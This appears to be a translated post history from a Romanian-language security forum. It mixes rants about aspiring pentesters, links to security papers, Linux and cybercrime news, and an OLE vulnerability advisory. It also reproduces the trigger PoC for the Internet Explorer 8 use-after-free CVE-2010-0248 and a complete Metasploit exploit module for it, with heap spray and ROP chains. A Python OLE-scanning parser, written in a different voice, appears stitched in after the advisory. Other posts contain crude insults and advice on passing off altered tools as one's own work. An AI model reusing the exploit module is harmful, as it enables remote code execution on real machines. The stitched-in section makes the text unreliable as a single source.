Everything posted by Nytro
-
He's right, at least from the perspective he's speaking from, but the same principles apply everywhere. Let's take SQL Injection as an example. Vasile comes along and finds an SQL Injection in a site. Fine, does that mean he's "qualified" for a pentester job, or does finding a crappy SQL Injection in a site make him a pentester? NO. To be a good pentester you first need to know MySQL. Yes, you need to know the SQL language. And that would only be a KNOWLEDGE BASE. It's nowhere near enough. You need to know SQL Server, Oracle, SQLite too, and not just as database management systems but as attack vectors, plus a lot of administration. You need to know ASP.NET and Ruby, not just PHP, because not all sites are written in PHP. And that matters, because it's not two-bit companies that will pay for pentesting, it's big companies that DON'T USE MySQL and PHP but other technologies: Oracle, ASP.NET... How many of you (who claim to know PHP and MySQL, though I doubt you've written more than 1000 lines of code in those languages) know ASP.NET or other technologies? How many lines of code have you written to be able to claim you can find and FIX vulnerable code? Do you think knowing how to use a UNION in MySQL, or sticking a ../../etc/passwd somewhere, is enough, done, you write PENTESTER on your forehead? If that's what you think, it's clear, you're severely limited. And the two-bit tutorials you read are to blame. Actually, not the tutorials, but the fact that they're short, and that's the only thing that convinces you to read them, but it also limits you, because having learned one thing, you don't realize there are another 1000 that should be known, and you consider yourselves gods...
-
Elena?
-
Deep Dive into OS Internals with Windbg
Malware and OS Internals
An approach towards reversing malwares, shellcodes and other malicious codes to understand the ways in which they use the OS Internals for their functionality.

Contents:
- Preface (p. 3)
- Reversing Windows Internals (p. 4)
- Portable Executable Anatomy (p. 5)
- Data Directories of Interest (p. 7)
- Import Directory (p. 8)
- Import Address Table (p. 12)
- Export Directory (p. 13)
- Manual Walkthrough of Export Directory (p. 14)
- Process Environment Block (p. 17)
- Different methods to locate the PEB (p. 18)
- Understanding an Example Shellcode (p. 20)
- Using _PEB_LDR_DATA (p. 20)
- Using _LDR_DATA_TABLE_ENTRY (p. 23)
- Practical Example with Rustock.B Rootkit (p. 25)
- Conclusion (p. 32)
- References (p. 33)

Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18576.pdf
-
Pwn2Own Challenges: Heapsprays are for the 99%
BY PETER VREUGDENHIL, THU 15 MAR 2012

In case you aren't familiar with the Pwn2Own rules this year, we asked people to exploit public bugs... here's one of them. The CVE in question (CVE-2010-0248) is a use-after-free vulnerability in Internet Explorer 8 found by yours truly back in 2010. This specific bug is triggered by the following PoC:

<html>
<head>
<script>
function Start() {
    var TableClone = document.getElementById('tableid').cloneNode(1);
    var TableCellUrns = TableClone.cells.urns('a');
    //var bla = TableClone.cells.item(1);
    var TableCellUrnsTags = TableCellUrns.tags('a');
    TableClone.outerText = 'a';
    Result = TableClone.cells;
    Result = TableCellUrnsTags.item(-1);
}
</script>
</head>
<body onLoad="window.setTimeout(Start,100);" id="bodyid">
<table id="tableid">
<tr><th id="thid"></th></tr>
<tr id="trid"><td id="tdid"></td></tr>
</table>
</body>
</html>

This is also the trigger that we handed out to the contestants at Pwn2Own for the CVE challenges. So if you want to try it out yourself you should probably stop reading right now and just start playing around with it.

Full article: http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup
-
[h=1]MS10-002 Internet Explorer Object Memory Use-After-Free[/h]

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS10-002 Internet Explorer Object Memory Use-After-Free",
      'Description'    => %q{
          This module exploits a vulnerability found in Internet Explorer's mshtml component.
        Due to the way IE handles objects in memory, it is possible to cause a pointer in
        CTableRowCellsCollectionCacheItem::GetNext to be used even after it gets freed,
        therefore allowing remote code execution under the context of the user. This
        particular vulnerability was also one of 2012's Pwn2Own challenges, and was later
        explained by Peter Vreugdenhil with exploitation details. Instead of Peter's method,
        this module uses heap spraying like the 99% to store a specially crafted memory layout
        before re-using the freed memory.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Peter Vreugdenhil',  # Vulnerability discovery and exploit writeup
          'juan vazquez',       # Metasploit
          'sinn3r'              # Metasploit
        ],
      'References'     =>
        [
          [ 'MSB', 'MS10-002'],
          [ 'CVE', '2010-0248' ],
          [ 'OSVDB', '61914'],
          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2012/03/15/pwn2own-2012-challenge-writeup' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-014/']
        ],
      'Payload'        =>
        {
          'Space'       => 1000,
          'BadChars'    => "\x00",
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [
            'IE 8 on Windows XP SP3',
            {
              'Rop'    => :msvcrt,
              'Offset' => '0x5f4',
              'Ret'    => 0x77c15ed5
            },
          ],
          [
            'IE 8 on Windows 7 SP0',
            {
              'Rop'    => :jre,
              'Offset' => '0x5f4',
              'Ret'    => 0x7c348b05
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jan 21 2010",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
      return targets[1]  #IE 8 on Windows XP SP3
    elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
      return targets[2]  #IE 8 on Windows 7 SP1 with JRE
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    js_code = build_javascript(my_target)

    html = %Q|
    <html>
    <head>
    <script>
    #{js_code}
    </script>
    </head>
    <body onLoad="window.setTimeout(Start,100);" id="bodyid">
    <table id="tableid">
    <tr><th id="thid"></th></tr>
    <tr id="trid"><td id="tdid"></td></tr>
    </table>
    </body>
    </html>
    |

    print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

  def build_javascript(my_target)
    p = get_payload(my_target)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))

    # The exploit will try to take up the freed memory
    # with a fake item before the reuse
    fake_item = [
      junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk, junk,
      0x0c0c003c, # pointer to c_table_cell
      junk, junk, junk,
      0x0c0c0050, # pointer to c_cache_item
      junk, junk,
    ].pack("V*")
    fake_item_js = Rex::Text.to_unescape(fake_item)

    # Here start the crafted layout of the memory
    # which will be sprayed to get code execution
    # IE 8 => Spray be sprayed into 0c0c0024
    memory_layout = [
      junk, junk, junk, junk, junk, junk,
      0x0c0c0040, # ----- points to 0x0c0c0040
      0x0c0c0c0c, # <---| 0x0c0c0c0c + 0x70: 0x0c0c0c7c will store the stackpivot with eax pointing to 0c0c0c0c
      junk, junk,
      0x00000000, # Allows to bypass CTableCell::GetAAcolSpan
      junk,       # Stored at 0c0c0c50
      junk, junk,
      0x0c0c0078,
      junk, junk, junk, junk, junk,
      0x0c0c0c50, # <- Stored at 0c0c0074 (0x0c0c0078 - 4)
      0x00000001  # Stored at 0c0c0078 (0c0c0050+28)
                  # Allows to exit of CTableRowCellsCollectionCacheItem::GetNext faster
    ].pack("V*")
    memory_layout_js = Rex::Text.to_unescape(memory_layout)

    # Steps:
    # 1. Force the free.
    # 2. Try to reuse the freed memory with a fake item.
    #    The fake item store crafted pointers to the
    #    memory which will be sprayed on step 3.
    # 3. Heap Spray: Shellcode + crafted memory layout to
    #    get execution flow when the memory freed in step 1
    #    is reused in step 4.
    # 4. Force the memory reuse.
    spray = <<-JS
    function Start() {
      var fake_items = unescape("#{fake_item_js}");
      while (fake_items.length < 0x1000) fake_items+= fake_items;
      var fake_item = fake_items.substring(0, (96-6)/2);

      var code = unescape("#{js_code}");
      var memory_layout = unescape("#{memory_layout_js}")
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']} - memory_layout.length);
      var shellcode = memory_layout + offset + code + nops.substring(0, 0x800-#{my_target['Offset']}-code.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block_shell = shellcode.substring(0, (0x80000-6)/2);

      var heap = new heapLib.ie(0x20000);

      var TableClone = document.getElementById('tableid').cloneNode(1);
      var TableCellUrns = TableClone.cells.urns('a');
      var bla = TableClone.cells.item(1);
      var TableCellUrnsTags = TableCellUrns.tags('a');
      TableClone.outerText = 'a';

      heap.gc();
      for(i = 0; i < 30; i++) {
        heap.alloc(fake_item);
      }

      for (var i=1; i < 0x1C2; i++) {
        heap.alloc(block_shell);
      }

      Result = TableClone.cells;
      Result = TableCellUrnsTags.item(1);
    }
    JS

    spray = heaplib(spray, {:noobfu => true})
    return spray
  end

  def nop
    return make_nops(4).unpack("V").first
  end

  def junk(n=4)
    return rand_text_alpha(n).unpack("V").first
  end

  # ROP chain + shellcode will be sprayed at 0x0c0c0c0c
  def get_payload(t)
    # chain generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      rop = [
        0x77c4e392, # POP EAX # RETN
        0x77c11120, # <- *&VirtualProtect()
        0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
        junk,
        0x77c2dd6c,
        0x77c4ec00, # POP EBP # RETN
        0x77c35459, # ptr to 'push esp # ret'
        0x77c47705, # POP EBX # RETN
        0x00000800, # <- change size to mark as executable if needed (-> ebx)
        0x77c3ea01, # POP ECX # RETN
        0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
        0x77c46100, # POP EDI # RETN
        0x77c46101, # ROP NOP (-> edi)
        0x77c4d680, # POP EDX # RETN
        0x00000040, # newProtect (0x40) (-> edx)
        0x77c4e392, # POP EAX # RETN
        nop,        # NOPS (-> eax)
        0x77c12df9, # PUSHAD # RETN
      ].pack("V*")
    when :jre
      rop = [
        0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
        0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
        0x7c347f98, # RETN (ROP NOP)
        0x7c3415a2, # JMP [EAX]
        0xffffffff,
        0x7c376402, # skip 4 bytes
        0x7c351e05, # NEG EAX # RETN
        0x7c345255, # INC EBX # FPATAN # RETN
        0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
        0x7c344f87, # POP EDX # RETN
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7c351eb1, # NEG EDX # RETN
        0x7c34d201, # POP ECX # RETN
        0x7c38b001, # &Writable location
        0x7c347f97, # POP EAX # RETN
        0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
        0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
        0x7c345c30, # ptr to 'push esp # ret '
      ].pack("V*")
    end

    code = rop
    code << make_nops(38)
    code << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+0x6").encode_string # instr length: 2 bytes
    code << [t.ret].pack("V")  # Stack Pivot
    code << payload.encoded

    return code
  end

end

=begin
(694.cc0): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000100 ecx=0241f518 edx=7c90e4f4 esi=7c90d6d0 edi=ffffffff
eip=7c8022cf esp=0241f534 ebp=0241f548 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
kernel32!WriteProcessMemory+0x6d:
7c8022cf cc              int     3
=end

Source: MS10-002 Internet Explorer Object Memory Use-After-Free
-
Yes redox, you're right, I see people everywhere who want salaries of 1500-2000 euros a month. The vast majority are computer science students. The same goes for the losers on RST. What the fuck do you know how to do for that money? What would someone have to do for you to give them 2000 euros a month? Let's be serious, even if you had the money, you wouldn't give that much even to the classiest whore, but when it comes to receiving, you all want a pile of money, and you want it for nothing. Take my classic example: the students in my faculty, computer science. What do they know how to do? Suck dick. They don't EVEN know what's taught at the faculty; even though they're nerds and get high marks, if you ask them two months later how the cast operator is overloaded in C++ you'll want to slap them. They don't know what HTTP is, don't know what TCP means, don't know what a DLL is and don't know what grep does, but when it comes to salaries... "Daddy, I want to be a programmer and have 1000 euros as my first salary, because I'm so fucking smart." It's the same here. You all think you're smart because you find an XSS/SQLi. You want to become "pentesters" thinking you're bursting with brains. And above all you want at least 2000 euros for it. Or you want to become programmers, and even though you HAVEN'T WRITTEN 200 LINES OF CODE in your lives, you want someone to offer you thousands of euros, to have billiards, whisky and whores at work and not do any work at all... Wake up to reality...
-
What you want to do is called, less technically, "hexing", i.e. you want to take someone else's work and just change the strings. I don't know what crap those crappy things you use for scanning contain, but they're probably compiled C programs. A decompiler won't help you much, especially since from the way you express yourself I can tell these aren't exactly details that interest you.

To understand:
- learn a little C on Linux
- read about the structure of Linux executables (search for "ELF File Format")
- see what a debugger does

To understand nothing and just change a string, which is what you'll do 99% of the time:
- find a Hex Editor (it doesn't matter whether it's for Linux or Windows)
- open that executable file
- change those strings, BUT make sure the length of the text you put in is EXACTLY the length of the previous text so you don't break the executable's structure. You can try adding a \0 if your text is shorter, or you can risk going over a bit, but then don't be surprised if the program crashes
- then send the program to everyone and brag about someone else's work (the person before you probably did the same anyway), saying you made it
-
Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation
Tarjei Mandt, Norman Threat Research, tarjei.mandt @ norman.com

Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal.

Keywords: null pointer vulnerabilities, exploitation, mitigation

Download: http://www.mista.nu/research/nullpage.pdf
-
Yeah, slick.
-
Get yourself over to Real/Carrefour/Cora, the drinks aisle...
-
After a while...

- Cyber Criminals Selling Millions of U.S military email addresses
- Yet Another Google Chrome Sandbox Critical Exploit by Turkish security experts
- Kaspersky finds Malware that resides in your RAM
- The Linux Tips
- Exploit For Ms12-020 RDP Bug Moves to Metasploit
- MS12-002 Microsoft Remote Desktop Use-After-Free DoS
- MS12-020 Vulnerability for Breakfast
- Symantec Identifies New Duqu Trojan Driver Variant
- Address spoofing vulnerability in iOS's Safari
- Advanced Firewall Configurations with ipset
- Java Applet Same-Origin Policy Bypass via HTTP Redirect
- Source Code Spoofing with HTML5 and the LTO Character
- Debian's x11-common init script weakness (CVE-2012-1093)
- Portable Executable File Format – A Reverse Engineer View
- Adobe Photoshop 12.1 Tiff Parsing Use-After-Free
- Compiling Nmap for Android
- BackTrack tool review: goofile
- VIDEO: How to solve the RSA 2012
- Joomla 2.5.0-2.5.1 Time Based SQL Injection Exploit
- Debugger Inception – The Scriptable Debugger Within The Debugger
- An interesting case of JRE sandbox breach (CVE-2012-0507)
- Insecure magazine - RSA Conference
- Reverse Engineering Firmware: Linksys WAG120N
- Microsoft OLE for Windows code execution
- Romania and cybercrime, trends
- What's New in Linux 3.3?

Updated: https://www.facebook.com/rstforum
-
[h=2]What's New in Linux 3.3?[/h]
Tuesday, 20 March 2012 10:54, Joe 'Zonker' Brockmeier

Sunday, Linus Torvalds released the 3.3 Linux kernel. In the latest installment of the continuing saga of kernel development, we've got more progress towards Android in the kernel, EFI boot support, Open vSwitch, and improvements that should help with the problem of Bufferbloat.

Is it just me, or is it still a little weird to be talking about 3.x kernels? It's been about eight months since the official bump to 3.0, but that's compared to more than seven years with the 2.6.x series. At any rate, here we are. Let's take a look at some of the changes in Linux 3.3!

[h=3]Everybody was Bufferbloat Fighting![/h]
The Android patches are likely to get the most attention in 3.3, but the thing that I'm most excited by? More work going on to solve the Bufferbloat problem. In a nutshell, Bufferbloat is a symptom of a lot of small problems that creates "a huge drag on Internet performance, ironically, by previous attempts to make it work better." Or the one-sentence summary, "bloated buffers lead to network-crippling latency spikes." It's not a problem that's going to be solved all in one go, or in one area. But the Linux kernel is one of the pieces that needs addressing. In the 3.3 release, we've got the ability to set byte queue limits in the kernel.

[h=3]Driver Goodies[/h]
Check out the list of drivers that have made it out of staging. Specifically, the gma500 driver is out of staging. This means the infamous Poulsbo chipset should be supported in the mainline kernel finally.

This release also includes the NVM Express driver (NVMe) which supports solid state disks attached to the PCI-Express bus. Most SSDs are SATA, Fibre Channel or SAS drives. The work was done by Intel's Matthew Wilcox, which isn't surprising since the NVM Express standard is also supported by Intel and a number of other companies. Would love to get my hands on one of these drives to test the 3.3 kernel out...

Want to tether your Linux box to your brand new iPhone? The iPhone USB Ethernet Driver (ipeth) module has been updated to add support for the iPhone 4S. The 3.3 kernel also picks up some drivers for third generation Wacom Bamboo tablets and Cintiq 24HD, and initial driver support for the Intuos4.

[h=3]Open vSwitch[/h]
Another biggie in 3.3? The Open vSwitch project is merging into the kernel tree. It's not new – it's been around for some time – but it's finally making its way into the mainline kernel. (This seems to be a frequent theme, doesn't it?) Basically, Open vSwitch is a virtual switch for complex virtualized server deployments. Given the ever-growing popularity of virtualized servers and cloud deployments, this is something in high demand.

As the Open vSwitch page says, "Open vSwitch can operate both as a soft switch running within the hypervisor, and as the control stack for switching silicon. It has been ported to multiple virtualization platforms and switching chipsets. It is the default switch in XenServer 6.0, the Xen Cloud Platform and also supports Xen, KVM, Proxmox VE and VirtualBox. It has also been integrated into many virtual management systems including OpenStack, openQRM, and OpenNebula." No doubt, you'll be reading more about Open vSwitch on Linux.com in the near future.

[h=3]Android Comes Closer[/h]
Last, but not least, the 3.3 kernel includes nearly complete support for Android. This is good news all around, but isn't really a surprise. The kernel folks have been working on this for a long time. Now the question is, will we start seeing Android apps on top of normal distributions? Will we start seeing standard Linux apps running on Android? Will mod communities, like CyanogenMod, start using the mainline kernel? Should be an interesting year. Then again, when isn't it an interesting year when Linux is involved?

As usual, the release includes lots more fixes, new drivers, and so forth. Check out the Kernel Newbies page for more. The merge window for 3.4 is now open, with the traditional two-week cutoff for pull requests. Looking forward to what 3.4 brings!

Source: https://www.linux.com/news/featured-blogs/196:zonker/556270:whats-new-in-linux-33
-
[h=1]Romania and cybercrime, trends[/h]
20 March 2012

Today the first part of the conference "România, încotro? Criminalitatea informatică în secolul 21" (Romania, where to? Cybercrime in the 21st century), organized by Oxygen Events, took place at the National Bank. There are a few interesting conclusions that I will comment on a little below.

The first is that cyber attacks are becoming more and more sophisticated, but that is nothing new. What is new is that the authorities are not standing still. There is direct collaboration with IGPR, the cybercrime division. The BNR has a working forum that deals with cybercrime issues, an inter-bank commission that handles the most important cases concerning banks, customers or institutions in the field.

Armin Dinar, risk manager at PriceWaterhouse Coopers, presented a detailed study on cyber threats and the main fears of the affected companies and institutions. It was not losing money that came first, but losing prestige or image in the industry.

Ioana Vasiu, who moderated the opening session, said that cybercrime currently reaches 388 billion dollars a year, close to the value of worldwide drug trafficking, which was calculated last year at 411 billion dollars. "It is clear where the crime industry is moving," she stressed.

Andrei Petruș, product manager at Bitdefender: threats are moving rapidly towards mobile devices. Mobile operating systems are secure, but phenomena such as jailbreaking and unlocking handsets open the way to increasingly dangerous attacks. The growth in the number of attacks on mobile devices in 2011 was 4500%, he added.

Via: SecuritateIT
Source: Romania and cybercrime, trends - Securitate IT
-
Microsoft OLE for Windows code execution

#######################################################################

                             Luigi Auriemma

Application:  Microsoft OLE for Windows
              http://www.microsoft.com
Versions:     ole32.dll < 5.1.2600.6168
Platforms:    Windows XP and 2003 before 13 Dec 2011
              NOT vulnerable: any other OS from Windows Vista
Bug:          code execution
Exploitation: remote and via file
Date:         found    16 May 2011
              patched  13 Dec 2011
              adv/PoC  20 Mar 2012
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

Additional references:
http://technet.microsoft.com/en-us/security/bulletin/ms11-093
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=966
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3400

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From the iDefense advisory:
"Many Windows applications that support the structured storage file format (Office applications for example) contain support for reading the SummaryInformation stream inside of the OLE document. This stream contains various properties that describe the document (the author for example). In addition to Office, Windows Explorer also supports parsing these streams when a file is clicked and viewed via the preview pane."

#######################################################################

======
2) Bug
======

First a couple of links about the OLE compound format:
http://poi.apache.org/hpsf/internals.html
http://msdn.microsoft.com/en-us/library/aa380072%28v=vs.85%29.aspx

Example of an HPSF header referred to the provided Visio proof-of-concept:

offset  bytes  description
1200    2      0xfffe
1202    2      0
1204    4      operating system
1208    16     clsid:0
1218    4      1
121c    16     clsid:F29F85E0-4FF9-1068-AB91-08002B27B3D9
122c    4      offset from the 0xfffe header
1230    4      section size
1234    4      number of properties (0xb)
1238    4      property type (for example 2 for title, 4 author and so on)
123c    4      property offset (relative to 0x1230)
...
1288    4      property type 0x11 (VT_CF) used for PID_THUMBNAIL
128c    4      the original was located at offset 1358, now 13da

For exploiting the vulnerability it's necessary to use the VT property VT_VERSIONED_STREAM (0x49) which is the cause of the type confusion vulnerability leading to a trivial to exploit code execution.

From ole32!CoWaitForMultipleHandles:

7756edcc 8b4708   mov  eax,dword ptr [edi+8]
7756edcf 8b4010   mov  eax,dword ptr [eax+10h]
7756edd2 8b08     mov  ecx,dword ptr [eax]
7756edd4 50       push eax
7756edd5 ff5108   call dword ptr [ecx+8]   ; code execution

The vulnerability has been tested with PPT, XLS and VSD files with the same effects:
- remote exploitation via Internet Explorer, for example if there are Office Viewers installed
- automatic exploiting of explorer.exe if thumbnail previewing of the folder is enabled (if I'm not in error Windows XP has it activated by default), immediately upon opening the folder where the modified PPT file is located
- if the preview mode is not enabled it's necessary to view the properties of the file (right mouse button -> Properties)
- exploitation via the opening of the file may be possible only in some cases (Visio Viewer confirmed)

The proof-of-concept should be able to execute calc.exe via Internet Explorer and Visio Viewer; the bug is so trivial to exploit that it's even possible to not use heap spray with some additional work.

#######################################################################

===========
3) The Code
===========

Proof-of-concept for Visio Viewer exploitable remotely via Internet Explorer:
http://aluigi.org/poc/ole32_1.zip

#######################################################################

======
4) Fix
======

http://technet.microsoft.com/en-us/security/bulletin/ms11-093

#######################################################################

Source: http://aluigi.org/adv/ole32_1-adv.txt
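As an added example (not code from Auriemma's advisory), the following Python parser walks a SummaryInformation property set stream using the header layout in the table above (the 0xfffe marker, one FMTID/offset pair, then a section of size, count and a property table whose offsets are relative to the section start) and reports anything a defender would want flagged before a file reaches a preview handler: offsets that leave the section, string lengths that overrun it, and a property whose declared type is VT_VERSIONED_STREAM (0x49), the type the advisory names as the MS11-093 trigger. The stream bytes are constructed in `build_sample` purely as test data; the parser works on a bare stream, so the offsets are relative to the stream rather than to 0x1200 as in the advisory's file-level dump.

```python
import struct

# Property types and ids named in the advisory (constructed example, not Auriemma's code)
VT_CF = 0x11                 # clipboard format, the legitimate type for PID_THUMBNAIL
VT_LPSTR = 0x1E              # length-prefixed ANSI string
VT_VERSIONED_STREAM = 0x49   # the type the advisory identifies as the confusion trigger
PID_THUMBNAIL = 0x11
HEADER_LEN = 0x30            # 0xfffe header + one FMTID/offset pair, as in the table above
# FMTID_SummaryInformation F29F85E0-4FF9-1068-AB91-08002B27B3D9 in its on-disk byte order
FMTID_SUMMARY = bytes.fromhex("E0859FF2F94F6810AB9108002B27B3D9")


def parse_property_set(stream):
    """Parse a single-section property set stream and return (props, findings).

    props maps property id -> (type, decoded value or None); findings lists
    structural problems and any property declared as VT_VERSIONED_STREAM."""
    findings = []
    if len(stream) < HEADER_LEN:
        raise ValueError("stream too short for a property set header")
    byte_order, _fmt_ver, _os_ver = struct.unpack_from("<HHI", stream, 0)
    if byte_order != 0xFFFE:
        raise ValueError("bad byte-order marker 0x%04x" % byte_order)
    num_sections, = struct.unpack_from("<I", stream, 0x18)
    fmtid = stream[0x1C:0x2C]
    sec_off, = struct.unpack_from("<I", stream, 0x2C)
    if num_sections != 1:
        findings.append("unexpected section count %d" % num_sections)
    if fmtid != FMTID_SUMMARY:
        findings.append("FMTID is not SummaryInformation")
    if sec_off + 8 > len(stream):
        raise ValueError("section offset 0x%x outside stream" % sec_off)
    sec_size, count = struct.unpack_from("<II", stream, sec_off)
    if sec_off + sec_size > len(stream):
        findings.append("section size 0x%x exceeds stream" % sec_size)
    sec_end = min(sec_off + sec_size, len(stream))
    props = {}
    for i in range(count):
        entry = sec_off + 8 + 8 * i
        if entry + 8 > sec_end:
            findings.append("property table entry %d outside section" % i)
            break
        pid, off = struct.unpack_from("<II", stream, entry)
        pos = sec_off + off               # property offsets are relative to the section start
        if pos + 4 > sec_end:
            findings.append("PID 0x%x: value offset 0x%x outside section" % (pid, off))
            continue
        vtype, = struct.unpack_from("<I", stream, pos)
        value = None
        if vtype == VT_LPSTR:
            n, = struct.unpack_from("<I", stream, pos + 4)
            if pos + 8 + n > sec_end:
                findings.append("PID 0x%x: string length %d overruns section" % (pid, n))
            else:
                value = stream[pos + 8:pos + 8 + n].rstrip(b"\x00").decode("latin-1")
        elif vtype == VT_VERSIONED_STREAM:
            findings.append("PID 0x%x declared as VT_VERSIONED_STREAM (0x49): "
                            "the MS11-093 type-confusion trigger" % pid)
        props[pid] = (vtype, value)
    return props, findings


def build_sample(thumbnail_type):
    """Build a minimal SummaryInformation-style stream (constructed test data)."""
    def lpstr(s):
        b = s.encode("latin-1") + b"\x00"
        return struct.pack("<II", VT_LPSTR, len(b)) + b
    values = [
        (0x02, lpstr("Quarterly report")),                                  # PIDSI_TITLE
        (0x04, lpstr("A. Author")),                                         # PIDSI_AUTHOR
        (PID_THUMBNAIL, struct.pack("<I", thumbnail_type) + b"\x00" * 8),   # thumbnail
    ]
    table_len = 8 + 8 * len(values)           # size + count + (pid, offset) pairs
    table, body, off = b"", b"", table_len
    for pid, val in values:
        table += struct.pack("<II", pid, off)
        body += val
        off += len(val)
    section = struct.pack("<II", table_len + len(body), len(values)) + table + body
    header = (struct.pack("<HHI", 0xFFFE, 0, 2) + b"\x00" * 16
              + struct.pack("<I", 1) + FMTID_SUMMARY + struct.pack("<I", HEADER_LEN))
    return header + section


def scan(stream):
    """True when the stream parses cleanly, False when any finding was raised."""
    _, findings = parse_property_set(stream)
    return not findings
```

`scan()` is the piece you would hang off a mail gateway or upload handler: a SummaryInformation stream pulled out of a compound file with a structured-storage library is passed in, and any finding is reason to quarantine rather than preview.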
-
[h=1]Binary Auditor Crackmes/Reversemes[/h]
Item name: Binary Auditor Crackmes/Reversemes
Rating: 5.0 (1 vote)
Author: Dr. TS and REA
Home URL: http://www.binary-auditing.com
Version (if appl.): 1.001
Direct D/L link: Locally archived copy
Description: The archive of the now defunct binary-auditor website. As far as I know, this is the most recently uploaded compilation. Included in the archive is the beginner guide.
Related URLs: No related URLs have been submitted for this item yet

Source: Binary Auditor Crackmes/Reversemes - Collaborative RCE Knowledge Library
Download: http://www.woodmann.com/collaborative/knowledge/images/Bin_Binary_Auditor_Crackmes_Reversemes_2011-2-1_19.17_Binary_Auditor_Lessons.zip
-
[h=1]Reverse Engineering Firmware: Linksys WAG120N[/h]
By Craig | May 29, 2011 | Embedded Systems, Tutorials

The ability to analyze a firmware image and extract data from it is extremely useful. It can allow you to analyze an embedded device for bugs, vulnerabilities, or GPL violations without ever having access to the device. In this tutorial, we’ll be examining the firmware update file for the Linksys WAG120N with the intent of finding and extracting the kernel and file system from the firmware image.

The firmware image used is for the WAG120N hardware version 1.0, firmware version 1.00.16 (ETSI) Annex B, released on 08/16/2010 and is currently available for download from the Linksys Web site.

The first thing to do with a firmware image is to run the Linux file utility against it to make sure it isn’t a standard archive or compressed file. You don’t want to sit down and start analyzing a firmware image only to realize later that it’s just a ZIP file:

OK, it’s nothing known to the file utility. Next, let’s do a hex dump and run strings on it:

Taking a look at the strings output, we see references to the U-Boot boot loader and the Linux kernel. This is encouraging, as it suggests that this device does in fact run Linux, and U-Boot is a very common and well documented boot loader:

However, taking a quick look at the hexdump doesn’t immediately reveal anything interesting:

So let’s run binwalk against the firmware image to see what it can identify for us. There are a lot of false positive matches (these will be addressed in the up-coming 0.3.0 release!), but there are a few results that stand out:

Binwalk has found two uImage headers (which is the header format used by U-Boot), each of which is immediately followed by an LZMA compressed file. Binwalk breaks out most of the information contained in these uImage headers, including their descriptions: ‘u-boot image’ and ‘MIPS Linux-2.4.31’. It also shows the reported compression type of ‘lzma’.

Since each uImage header is followed by LZMA compressed data, this information appears to be legitimate. The LZMA files can be extracted with dd and then decompressed with the lzma utility. Don’t worry about specifying a size limit when running dd; any trailing garbage will be ignored by lzma during decompression:

We are now left with the decompressed files ‘uboot’ and ‘kernel’. Running strings against them confirms that they are in fact the U-Boot and Linux kernel images:

We’ve got the kernel and the boot loader images, now all that’s left is finding and extracting the file system. Since binwalk didn’t find any file systems that looked legitimate, we’re going to have to do some digging of our own. Let’s run strings against the extracted Linux kernel and grep the output for any file system references; this might give us a hint as to what file system(s) we should be looking for:

